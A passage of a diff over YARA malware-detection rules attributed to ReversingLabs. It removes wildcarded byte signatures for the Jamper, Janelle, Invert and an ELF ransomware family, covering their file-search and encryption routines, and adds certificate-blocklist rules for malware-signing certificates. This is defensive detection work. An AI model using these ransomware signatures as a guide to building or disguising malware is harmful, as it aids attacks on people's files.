-            7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89
-            EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5
-            B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3
-        }
-		$make_configuration = {
-            41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ??
-            ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00
-            ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
-            E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ??
-            83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48
-            63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5
-            48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $setup_environment ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $make_configuration )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jamper ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13728-L13744"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2"
+		logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jamper"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
-            89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45
-            ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ??
-            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ??
-            8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9
-            ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ??
-            55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B
-            18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B
-            F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
-            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
-            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
-            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
-            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
-            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
-            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ??
-            64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B
-            58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B
-            D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ??
-            E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B
-            08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7
-            40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ??
-            ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
-            ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALAIS, OOO" and pe.signatures [ i ] . serial == "33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Janelle ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4fef3be5-8332-5ce2-b1e9-3993e6963331"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		id = "fa2302c3-4002-5bf0-812b-45298abbda8d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13746-L13762"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7"
+		logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Janelle"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env_p1 = {
-            00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ??
-            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F
-            ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ??
-            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
-            12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02
-        }
-		$setup_env_p2 = {
-            7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-            ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02
-            7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 2A
-        }
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00
-            03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
-            00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ??
-            ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE
-            ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A
-        }
-		$encrypt_files = {
-            00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ??
-            ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
-            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06
-            8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ??
-            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ??
-            16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE
-            02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00
-            07 6F ?? ?? ?? ?? 00 00 DC 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $setup_env_p* ) ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Invert ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96"
-		date = "2021-11-11"
-		modified = "2021-11-11"
+		id = "0b34c7ce-fa75-5340-a473-fa87fab93b86"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13764-L13780"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14"
+		logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Invert"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D
-            ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25
-            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73
